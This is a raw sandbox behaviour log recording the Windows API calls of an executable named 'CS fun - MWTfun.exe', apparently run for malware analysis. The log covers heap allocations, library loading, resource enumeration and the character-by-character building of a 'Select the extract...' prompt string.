# Flog Txt Version 1 # Analyzer Version: 3.2.2 # Analyzer Build Date: Mar 3 2020 14:14:30 # Log Creation Date: 16.04.2020 18:45:15.646 Process: id = "1" image_name = "cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe" filename = "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe" page_root = "0x9d4e000" os_pid = "0xe70" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x560" cmd_line = "\"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe\" " cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 1 os_tid = 0x1108 [0080.655] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0080.656] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x22b0000 [0080.739] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x2410000 [0080.852] RtlAllocateHeap (HeapHandle=0x2410000, Flags=0x0, Size=0xc) returned 0x24105a8 [0080.852] RtlAllocateHeap (HeapHandle=0x2410000, Flags=0x0, Size=0x10) returned 0x24105c0 [0080.852] RtlAllocateHeap (HeapHandle=0x22b0000, Flags=0x8, Size=0x38) returned 0x22b05a8 [0080.852] RtlAllocateHeap (HeapHandle=0x22b0000, Flags=0x8, Size=0x40) returned 0x22b05e8 [0080.853] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x900000 [0080.853] RtlAllocateHeap (HeapHandle=0x22b0000, Flags=0x8, Size=0x10) returned 0x22b0630 [0080.853] RtlReAllocateHeap (Heap=0x22b0000, Flags=0x8, Ptr=0x22b0630, Size=0x10) returned 0x22b0630 [0080.853] RtlAllocateHeap (HeapHandle=0x22b0000, Flags=0x8, Size=0x38) returned 0x22b0648 [0080.853] RtlAllocateHeap (HeapHandle=0x22b0000, Flags=0x8, Size=0x10) returned 0x22b0688 [0080.853] InitCommonControlsEx (picce=0x19ff74) returned 1 [0080.860] CoInitialize (pvReserved=0x0) returned 0x0 [0082.551] wcslen (_String="*") returned 0x1 [0082.551] RtlAllocateHeap (HeapHandle=0x2410000, Flags=0x0, Size=0xc) returned 0x24105d8 [0082.551] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0082.551] RtlAllocateHeap (HeapHandle=0x22b0000, Flags=0x0, Size=0x3c) returned 0x22b06a0 [0082.551] RtlAllocateHeap (HeapHandle=0x22b0000, Flags=0x8, Size=0x800) returned 0x22b06e8 [0082.552] LoadLibraryW (lpLibFileName="Kernel32.dll") returned 0x772d0000 [0082.552] GetProcAddress (hModule=0x772d0000, lpProcName="InitOnceExecuteOnce") returned 0x74cb5550 [0082.552] InitOnceExecuteOnce (in: InitOnce=0x41861c, InitFn=0x40da23, Parameter=0x40d9e2, Context=0x19ff24 | out: InitOnce=0x41861c, Parameter=0x40d9e2, Context=0x19ff24*=0x4) returned 1 [0082.552] FreeLibrary (hLibModule=0x772d0000) returned 1 [0082.552] RtlAllocateHeap (HeapHandle=0x22b0000, Flags=0x0, Size=0x18) returned 0x22b0ef0 [0082.552] RtlAllocateHeap (HeapHandle=0x22b0000, Flags=0x0, Size=0x38) returned 0x22b0f10 [0082.553] RtlAllocateHeap (HeapHandle=0x22b0000, Flags=0x8, Size=0xc) returned 0x22b0f50 [0082.553] RtlAllocateHeap (HeapHandle=0x22b0000, Flags=0x0, Size=0x34) returned 0x22b0f68 [0082.553] LoadLibraryW (lpLibFileName="Kernel32.dll") returned 0x772d0000 [0082.554] GetProcAddress (hModule=0x772d0000, lpProcName="InitOnceExecuteOnce") returned 0x74cb5550 [0082.554] InitOnceExecuteOnce (in: InitOnce=0x41861c, InitFn=0x40da23, Parameter=0x40d9e2, Context=0x19ff2c | out: InitOnce=0x41861c, Parameter=0x40d9e2, Context=0x19ff2c*=0x4) returned 1 [0082.554] FreeLibrary (hLibModule=0x772d0000) returned 1 [0082.554] RtlAllocateHeap (HeapHandle=0x22b0000, Flags=0x0, Size=0x18) returned 0x22b0fa8 [0082.554] RtlAllocateHeap (HeapHandle=0x22b0000, Flags=0x0, Size=0x38) returned 0x22b0fc8 [0082.554] RtlAllocateHeap (HeapHandle=0x22b0000, Flags=0x0, Size=0x34) returned 0x22b1008 [0082.554] LoadLibraryW (lpLibFileName="Kernel32.dll") returned 0x772d0000 [0082.554] GetProcAddress (hModule=0x772d0000, lpProcName="InitOnceExecuteOnce") returned 0x74cb5550 [0082.555] InitOnceExecuteOnce (in: InitOnce=0x41861c, InitFn=0x40da23, Parameter=0x40d9e2, Context=0x19ff2c | out: InitOnce=0x41861c, Parameter=0x40d9e2, Context=0x19ff2c*=0x4) returned 1 [0082.555] FreeLibrary (hLibModule=0x772d0000) returned 1 [0082.555] RtlAllocateHeap (HeapHandle=0x22b0000, Flags=0x0, Size=0x124fa4) returned 0x2168020 [0082.654] wcslen (_String="\\") returned 0x1 [0082.654] RtlAllocateHeap (HeapHandle=0x2410000, Flags=0x0, Size=0xc) returned 0x24105f0 [0082.654] RtlAllocateHeap (HeapHandle=0x22b0000, Flags=0x0, Size=0x34) returned 0x22b1048 [0082.654] LoadLibraryW (lpLibFileName="Kernel32.dll") returned 0x772d0000 [0082.654] GetProcAddress (hModule=0x772d0000, lpProcName="InitOnceExecuteOnce") returned 0x74cb5550 [0082.654] InitOnceExecuteOnce (in: InitOnce=0x41861c, InitFn=0x40da23, Parameter=0x40d9e2, Context=0x19ff2c | out: InitOnce=0x41861c, Parameter=0x40d9e2, Context=0x19ff2c*=0x4) returned 1 [0082.654] FreeLibrary (hLibModule=0x772d0000) returned 1 [0082.654] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4098f0) returned 0x0 [0082.655] GetLastError () returned 0x0 [0082.655] SetLastError (dwErrCode=0x0) [0082.656] GetLastError () returned 0x0 [0082.656] SetLastError (dwErrCode=0x0) [0082.656] GetLastError () returned 0x0 [0082.656] SetLastError (dwErrCode=0x0) [0082.656] GetLastError () returned 0x0 [0082.656] SetLastError (dwErrCode=0x0) [0082.656] GetLastError () returned 0x0 [0082.656] SetLastError (dwErrCode=0x0) [0082.656] GetLastError () returned 0x0 [0082.656] SetLastError (dwErrCode=0x0) [0082.656] RtlAllocateHeap (HeapHandle=0x22b0000, Flags=0x0, Size=0x9c) returned 0x22b1088 [0082.656] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24105c0, Size=0x404a) returned 0x2410608 [0082.657] HeapFree (in: hHeap=0x22b0000, dwFlags=0x0, lpMem=0x22b1088 | out: hHeap=0x22b0000) returned 1 [0082.657] RtlAllocateHeap (HeapHandle=0x2410000, Flags=0x0, Size=0x4a) returned 0x2414660 [0082.657] GetLastError () returned 0x0 [0082.657] SetLastError (dwErrCode=0x0) [0082.657] GetLastError () returned 0x0 [0082.657] SetLastError (dwErrCode=0x0) [0082.657] GetLastError () returned 0x0 [0082.657] SetLastError (dwErrCode=0x0) [0082.657] GetModuleFileNameW (in: hModule=0x400000, lpFilename=0x2410608, nSize=0x104 | out: lpFilename="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe")) returned 0x4d [0082.657] wcscmp (_String1="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", _String2="\\\\?\\") returned -1 [0082.658] LoadLibraryExW (lpLibFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", hFile=0x0, dwFlags=0x2) returned 0x400000 [0082.658] GetLastError () returned 0x0 [0082.658] SetLastError (dwErrCode=0x0) [0082.658] EnumResourceTypesW (hModule=0x400000, lpEnumFunc=0x402109, lParam=0x0) returned 1 [0082.660] EnumResourceNamesW (hModule=0x400000, lpType=0xa, lpEnumFunc=0x402e57, lParam=0x0) returned 1 [0082.661] RtlAllocateHeap (HeapHandle=0x22b0000, Flags=0x0, Size=0x118) returned 0x22b1088 [0082.661] GetLastError () returned 0x0 [0082.661] SetLastError (dwErrCode=0x0) [0082.661] GetLastError () returned 0x0 [0082.661] SetLastError (dwErrCode=0x0) [0082.661] RtlAllocateHeap (HeapHandle=0x2410000, Flags=0x0, Size=0x1e) returned 0x24146b8 [0082.661] GetLastError () returned 0x0 [0082.661] SetLastError (dwErrCode=0x0) [0082.661] GetLastError () returned 0x0 [0082.661] SetLastError (dwErrCode=0x0) [0082.661] RtlAllocateHeap (HeapHandle=0x2410000, Flags=0x0, Size=0x4a) returned 0x24146e0 [0082.662] GetLastError () returned 0x0 [0082.662] SetLastError (dwErrCode=0x0) [0082.662] GetLastError () returned 0x0 [0082.662] SetLastError (dwErrCode=0x0) [0082.662] RtlAllocateHeap (HeapHandle=0x2410000, Flags=0x0, Size=0x4a) returned 0x2414738 [0082.662] GetLastError () returned 0x0 [0082.663] SetLastError (dwErrCode=0x0) [0082.663] GetLastError () returned 0x0 [0082.663] SetLastError (dwErrCode=0x0) [0082.664] RtlAllocateHeap (HeapHandle=0x2410000, Flags=0x0, Size=0x5a) returned 0x2414790 [0082.664] FreeLibrary (hLibModule=0x400000) returned 1 [0082.664] GetLastError () returned 0x0 [0082.664] SetLastError (dwErrCode=0x0) [0082.664] wcslen (_String="4AF8053BEE") returned 0xa [0082.664] RtlAllocateHeap (HeapHandle=0x2410000, Flags=0x0, Size=0x1e) returned 0x24147f8 [0082.664] GetLastError () returned 0x0 [0082.664] SetLastError (dwErrCode=0x0) [0082.664] wcslen (_String="4AF8053BEE") returned 0xa [0082.664] RtlAllocateHeap (HeapHandle=0x2410000, Flags=0x0, Size=0x1e) returned 0x2414820 [0082.664] GetLastError () returned 0x0 [0082.664] SetLastError (dwErrCode=0x0) [0082.664] wcslen (_String="4DE237AD17CDF9EA9D31BEEBC81890A8") returned 0x20 [0082.664] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24147f8, Size=0x4a) returned 0x2414848 [0082.664] GetLastError () returned 0x0 [0082.664] SetLastError (dwErrCode=0x0) [0082.664] wcslen (_String="4DE237AD17CDF9EA9D31BEEBC81890A8") returned 0x20 [0082.665] RtlAllocateHeap (HeapHandle=0x2410000, Flags=0x0, Size=0x4a) returned 0x24148a0 [0082.665] GetLastError () returned 0x0 [0082.665] SetLastError (dwErrCode=0x0) [0082.665] wcslen (_String="81093E257A0DDDDC4ED186E0A1616949") returned 0x20 [0082.665] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x2414848, Size=0x4a) returned 0x2414848 [0082.665] GetLastError () returned 0x0 [0082.665] SetLastError (dwErrCode=0x0) [0082.665] wcslen (_String="4DE237AD17CDF9EA9D31BEEBC81890A8") returned 0x20 [0082.665] wcslen (_String="81093E257A0DDDDC4ED186E0A1616949") returned 0x20 [0082.665] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24148a0, Size=0x8a) returned 0x24148a0 [0082.665] GetLastError () returned 0x0 [0082.665] SetLastError (dwErrCode=0x0) [0082.665] wcslen (_String="AB3310E66B933AC8BA44A293A8D9A7BE45114BA9") returned 0x28 [0082.665] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x2414848, Size=0x5a) returned 0x2414938 [0082.665] GetLastError () returned 0x0 [0082.665] SetLastError (dwErrCode=0x0) [0082.665] wcslen (_String="4DE237AD17CDF9EA9D31BEEBC81890A881093E257A0DDDDC4ED186E0A1616949") returned 0x40 [0082.665] wcslen (_String="AB3310E66B933AC8BA44A293A8D9A7BE45114BA9") returned 0x28 [0082.665] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24148a0, Size=0xda) returned 0x24149a0 [0082.665] HeapFree (in: hHeap=0x2410000, dwFlags=0x0, lpMem=0x24146b8 | out: hHeap=0x2410000) returned 1 [0082.665] HeapFree (in: hHeap=0x2410000, dwFlags=0x0, lpMem=0x24146e0 | out: hHeap=0x2410000) returned 1 [0082.665] HeapFree (in: hHeap=0x2410000, dwFlags=0x0, lpMem=0x2414738 | out: hHeap=0x2410000) returned 1 [0082.666] HeapFree (in: hHeap=0x2410000, dwFlags=0x0, lpMem=0x2414790 | out: hHeap=0x2410000) returned 1 [0082.666] HeapFree (in: hHeap=0x22b0000, dwFlags=0x0, lpMem=0x22b1088 | out: hHeap=0x22b0000) returned 1 [0082.666] GetLastError () returned 0x0 [0082.666] SetLastError (dwErrCode=0x0) [0082.666] GetLastError () returned 0x0 [0082.666] SetLastError (dwErrCode=0x0) [0082.666] GetLastError () returned 0x0 [0082.666] SetLastError (dwErrCode=0x0) [0082.666] GetLastError () returned 0x0 [0082.666] SetLastError (dwErrCode=0x0) [0082.666] GetLastError () returned 0x0 [0082.666] SetLastError (dwErrCode=0x0) [0082.666] GetLastError () returned 0x0 [0082.666] SetLastError (dwErrCode=0x0) [0082.666] RtlAllocateHeap (HeapHandle=0x22b0000, Flags=0x0, Size=0x9c) returned 0x22b1088 [0082.666] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="9AB41154EB7A9D8A392A44AB8CA339B66E0133BA9496161A0E681DE4CDDDD0A752E390188A09818CBEEB13D9AE9FDC71DA732ED4", cchWideChar=105, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 105 [0082.666] malloc (_Size=0x6a) returned 0x9b24f0 [0082.666] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="9AB41154EB7A9D8A392A44AB8CA339B66E0133BA9496161A0E681DE4CDDDD0A752E390188A09818CBEEB13D9AE9FDC71DA732ED4", cchWideChar=105, lpMultiByteStr=0x9b24f0, cbMultiByte=105, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="9AB41154EB7A9D8A392A44AB8CA339B66E0133BA9496161A0E681DE4CDDDD0A752E390188A09818CBEEB13D9AE9FDC71DA732ED4", lpUsedDefaultChar=0x0) returned 105 [0082.667] free (_Block=0x9b24f0) [0082.667] HeapFree (in: hHeap=0x22b0000, dwFlags=0x0, lpMem=0x22b1088 | out: hHeap=0x22b0000) returned 1 [0082.667] RtlAllocateHeap (HeapHandle=0x2410000, Flags=0x0, Size=0x4a) returned 0x2414848 [0082.667] GetLastError () returned 0x0 [0082.667] SetLastError (dwErrCode=0x0) [0082.667] wcslen (_String="33FDC304E8EAAFF2D29444A4D87873A8") returned 0x20 [0082.667] RtlAllocateHeap (HeapHandle=0x2410000, Flags=0x0, Size=0x4a) returned 0x24148a0 [0082.667] GetLastError () returned 0x0 [0082.667] SetLastError (dwErrCode=0x0) [0082.667] GetLastError () returned 0x0 [0082.667] SetLastError (dwErrCode=0x0) [0082.667] GetLastError () returned 0x0 [0082.667] SetLastError (dwErrCode=0x0) [0082.667] GetLastError () returned 0x0 [0082.667] SetLastError (dwErrCode=0x0) [0082.667] RtlAllocateHeap (HeapHandle=0x22b0000, Flags=0x0, Size=0x9c) returned 0x22b1088 [0082.667] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="33FDC304E8EAAFF2D29444A4D87873A8", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0082.667] malloc (_Size=0x22) returned 0x9b1150 [0082.667] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="33FDC304E8EAAFF2D29444A4D87873A8", cchWideChar=33, lpMultiByteStr=0x9b1150, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="33FDC304E8EAAFF2D29444A4D87873A8", lpUsedDefaultChar=0x0) returned 33 [0082.667] free (_Block=0x9b1150) [0082.668] HeapFree (in: hHeap=0x22b0000, dwFlags=0x0, lpMem=0x22b1088 | out: hHeap=0x22b0000) returned 1 [0082.668] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x2414848, Size=0x4a) returned 0x2414848 [0082.668] GetLastError () returned 0x0 [0082.668] SetLastError (dwErrCode=0x0) [0082.668] GetLastError () returned 0x0 [0082.668] SetLastError (dwErrCode=0x0) [0082.668] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x2414848, Size=0x1e) returned 0x2414848 [0082.668] GetCommandLineW () returned="\"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe\" " [0082.668] HeapFree (in: hHeap=0x2410000, dwFlags=0x0, lpMem=0x2414938 | out: hHeap=0x2410000) returned 1 [0082.668] HeapFree (in: hHeap=0x2410000, dwFlags=0x0, lpMem=0x2414820 | out: hHeap=0x2410000) returned 1 [0082.668] HeapFree (in: hHeap=0x2410000, dwFlags=0x0, lpMem=0x24149a0 | out: hHeap=0x2410000) returned 1 [0082.668] HeapFree (in: hHeap=0x2410000, dwFlags=0x0, lpMem=0x24148a0 | out: hHeap=0x2410000) returned 1 [0082.668] HeapFree (in: hHeap=0x2410000, dwFlags=0x0, lpMem=0x2414848 | out: hHeap=0x2410000) returned 1 [0082.668] GetLastError () returned 0x0 [0082.668] SetLastError (dwErrCode=0x0) [0082.668] GetLastError () returned 0x0 [0082.668] SetLastError (dwErrCode=0x0) [0082.669] RtlAllocateHeap (HeapHandle=0x2410000, Flags=0x0, Size=0xc) returned 0x24105c0 [0082.669] GetLastError () returned 0x0 [0082.669] SetLastError (dwErrCode=0x0) [0082.669] wcslen (_String="S") returned 0x1 [0082.669] RtlAllocateHeap (HeapHandle=0x2410000, Flags=0x0, Size=0xc) returned 0x24146b8 [0082.669] GetLastError () returned 0x0 [0082.669] SetLastError (dwErrCode=0x0) [0082.669] GetLastError () returned 0x0 [0082.669] SetLastError (dwErrCode=0x0) [0082.669] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24105c0, Size=0xc) returned 0x24105c0 [0082.669] GetLastError () returned 0x0 [0082.669] SetLastError (dwErrCode=0x0) [0082.669] wcslen (_String="S") returned 0x1 [0082.669] wcslen (_String="e") returned 0x1 [0082.669] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24146b8, Size=0xe) returned 0x24146b8 [0082.669] GetLastError () returned 0x0 [0082.669] SetLastError (dwErrCode=0x0) [0082.669] GetLastError () returned 0x0 [0082.669] SetLastError (dwErrCode=0x0) [0082.669] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24105c0, Size=0xc) returned 0x24105c0 [0082.670] GetLastError () returned 0x0 [0082.670] SetLastError (dwErrCode=0x0) [0082.670] wcslen (_String="Se") returned 0x2 [0082.670] wcslen (_String="l") returned 0x1 [0082.670] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24146b8, Size=0x10) returned 0x24146b8 [0082.670] GetLastError () returned 0x0 [0082.670] SetLastError (dwErrCode=0x0) [0082.670] GetLastError () returned 0x0 [0082.670] SetLastError (dwErrCode=0x0) [0082.670] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24105c0, Size=0xc) returned 0x24105c0 [0082.670] GetLastError () returned 0x0 [0082.670] SetLastError (dwErrCode=0x0) [0082.670] wcslen (_String="Sel") returned 0x3 [0082.670] wcslen (_String="e") returned 0x1 [0082.670] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24146b8, Size=0x12) returned 0x24146b8 [0082.670] GetLastError () returned 0x0 [0082.670] SetLastError (dwErrCode=0x0) [0082.670] GetLastError () returned 0x0 [0082.670] SetLastError (dwErrCode=0x0) [0082.670] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24105c0, Size=0xc) returned 0x24105c0 [0082.670] GetLastError () returned 0x0 [0082.671] SetLastError (dwErrCode=0x0) [0082.671] wcslen (_String="Sele") returned 0x4 [0082.671] wcslen (_String="c") returned 0x1 [0082.671] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24146b8, Size=0x14) returned 0x24146b8 [0082.671] GetLastError () returned 0x0 [0082.671] SetLastError (dwErrCode=0x0) [0082.671] GetLastError () returned 0x0 [0082.671] SetLastError (dwErrCode=0x0) [0082.671] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24105c0, Size=0xc) returned 0x24105c0 [0082.671] GetLastError () returned 0x0 [0082.671] SetLastError (dwErrCode=0x0) [0082.671] wcslen (_String="Selec") returned 0x5 [0082.671] wcslen (_String="t") returned 0x1 [0082.671] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24146b8, Size=0x16) returned 0x24146b8 [0082.671] GetLastError () returned 0x0 [0082.671] SetLastError (dwErrCode=0x0) [0082.671] GetLastError () returned 0x0 [0082.671] SetLastError (dwErrCode=0x0) [0082.671] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24105c0, Size=0xc) returned 0x24105c0 [0082.671] GetLastError () returned 0x0 [0082.671] SetLastError (dwErrCode=0x0) [0082.671] wcslen (_String="Select") returned 0x6 [0082.672] wcslen (_String=" ") returned 0x1 [0082.672] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24146b8, Size=0x18) returned 0x24146b8 [0082.672] GetLastError () returned 0x0 [0082.672] SetLastError (dwErrCode=0x0) [0082.672] GetLastError () returned 0x0 [0082.672] SetLastError (dwErrCode=0x0) [0082.672] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24105c0, Size=0xc) returned 0x24105c0 [0082.672] GetLastError () returned 0x0 [0082.672] SetLastError (dwErrCode=0x0) [0082.672] wcslen (_String="Select ") returned 0x7 [0082.672] wcslen (_String="t") returned 0x1 [0082.672] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24146b8, Size=0x1a) returned 0x24146b8 [0082.672] GetLastError () returned 0x0 [0082.672] SetLastError (dwErrCode=0x0) [0082.672] GetLastError () returned 0x0 [0082.672] SetLastError (dwErrCode=0x0) [0082.672] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24105c0, Size=0xc) returned 0x24105c0 [0082.672] GetLastError () returned 0x0 [0082.672] SetLastError (dwErrCode=0x0) [0082.672] wcslen (_String="Select t") returned 0x8 [0082.673] wcslen (_String="h") returned 0x1 [0082.673] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24146b8, Size=0x1c) returned 0x24146b8 [0082.673] GetLastError () returned 0x0 [0082.673] SetLastError (dwErrCode=0x0) [0082.673] GetLastError () returned 0x0 [0082.673] SetLastError (dwErrCode=0x0) [0082.673] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24105c0, Size=0xc) returned 0x24105c0 [0082.673] GetLastError () returned 0x0 [0082.673] SetLastError (dwErrCode=0x0) [0082.673] wcslen (_String="Select th") returned 0x9 [0082.673] wcslen (_String="e") returned 0x1 [0082.673] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24146b8, Size=0x1e) returned 0x24146b8 [0082.673] GetLastError () returned 0x0 [0082.673] SetLastError (dwErrCode=0x0) [0082.673] GetLastError () returned 0x0 [0082.673] SetLastError (dwErrCode=0x0) [0082.673] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24105c0, Size=0xc) returned 0x24105c0 [0082.673] GetLastError () returned 0x0 [0082.673] SetLastError (dwErrCode=0x0) [0082.673] wcslen (_String="Select the") returned 0xa [0082.673] wcslen (_String=" ") returned 0x1 [0082.673] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24146b8, Size=0x20) returned 0x24146b8 [0082.674] GetLastError () returned 0x0 [0082.674] SetLastError (dwErrCode=0x0) [0082.674] GetLastError () returned 0x0 [0082.674] SetLastError (dwErrCode=0x0) [0082.674] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24105c0, Size=0xc) returned 0x24105c0 [0082.674] GetLastError () returned 0x0 [0082.674] SetLastError (dwErrCode=0x0) [0082.674] wcslen (_String="Select the ") returned 0xb [0082.674] wcslen (_String="e") returned 0x1 [0082.674] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24146b8, Size=0x22) returned 0x24146b8 [0082.674] GetLastError () returned 0x0 [0082.674] SetLastError (dwErrCode=0x0) [0082.674] GetLastError () returned 0x0 [0082.674] SetLastError (dwErrCode=0x0) [0082.674] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24105c0, Size=0xc) returned 0x24105c0 [0082.674] GetLastError () returned 0x0 [0082.674] SetLastError (dwErrCode=0x0) [0082.674] wcslen (_String="Select the e") returned 0xc [0082.674] wcslen (_String="x") returned 0x1 [0082.674] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24146b8, Size=0x24) returned 0x24146b8 [0082.674] GetLastError () returned 0x0 [0082.675] SetLastError (dwErrCode=0x0) [0082.675] GetLastError () returned 0x0 [0082.675] SetLastError (dwErrCode=0x0) [0082.675] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24105c0, Size=0xc) returned 0x24105c0 [0082.675] GetLastError () returned 0x0 [0082.675] SetLastError (dwErrCode=0x0) [0082.675] wcslen (_String="Select the ex") returned 0xd [0082.675] wcslen (_String="t") returned 0x1 [0082.675] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24146b8, Size=0x26) returned 0x24146b8 [0082.675] GetLastError () returned 0x0 [0082.675] SetLastError (dwErrCode=0x0) [0082.675] GetLastError () returned 0x0 [0082.675] SetLastError (dwErrCode=0x0) [0082.675] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24105c0, Size=0xc) returned 0x24105c0 [0082.675] GetLastError () returned 0x0 [0082.675] SetLastError (dwErrCode=0x0) [0082.675] wcslen (_String="Select the ext") returned 0xe [0082.675] wcslen (_String="r") returned 0x1 [0082.675] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24146b8, Size=0x28) returned 0x24146b8 [0082.675] GetLastError () returned 0x0 [0082.675] SetLastError (dwErrCode=0x0) [0082.676] GetLastError () returned 0x0 [0082.676] SetLastError (dwErrCode=0x0) [0082.676] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24105c0, Size=0xc) returned 0x24105c0 [0082.676] GetLastError () returned 0x0 [0082.676] SetLastError (dwErrCode=0x0) [0082.676] wcslen (_String="Select the extr") returned 0xf [0082.676] wcslen (_String="a") returned 0x1 [0082.676] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24146b8, Size=0x2a) returned 0x24146b8 [0082.676] GetLastError () returned 0x0 [0082.676] SetLastError (dwErrCode=0x0) [0082.676] GetLastError () returned 0x0 [0082.676] SetLastError (dwErrCode=0x0) [0082.676] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24105c0, Size=0xc) returned 0x24105c0 [0082.676] GetLastError () returned 0x0 [0082.676] SetLastError (dwErrCode=0x0) [0082.676] wcslen (_String="Select the extra") returned 0x10 [0082.676] wcslen (_String="c") returned 0x1 [0082.676] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24146b8, Size=0x2c) returned 0x24146b8 [0082.676] GetLastError () returned 0x0 [0082.677] SetLastError (dwErrCode=0x0) [0082.677] GetLastError () returned 0x0 [0082.677] SetLastError (dwErrCode=0x0) [0082.677] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24105c0, Size=0xc) returned 0x24105c0 [0082.677] GetLastError () returned 0x0 [0082.677] SetLastError (dwErrCode=0x0) [0082.677] wcslen (_String="Select the extrac") returned 0x11 [0082.677] wcslen (_String="t") returned 0x1 [0082.677] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24146b8, Size=0x2e) returned 0x24146b8 [0082.678] GetLastError () returned 0x0 [0082.678] SetLastError (dwErrCode=0x0) [0082.678] GetLastError () returned 0x0 [0082.678] SetLastError (dwErrCode=0x0) [0082.678] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24105c0, Size=0xc) returned 0x24105c0 [0082.678] GetLastError () returned 0x0 [0082.678] SetLastError (dwErrCode=0x0) [0082.678] wcslen (_String="Select the extract") returned 0x12 [0082.678] wcslen (_String="i") returned 0x1 [0082.678] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24146b8, Size=0x30) returned 0x24146b8 [0082.678] GetLastError () returned 0x0 [0082.678] SetLastError (dwErrCode=0x0) [0082.678] GetLastError () returned 0x0 [0082.678] SetLastError (dwErrCode=0x0) 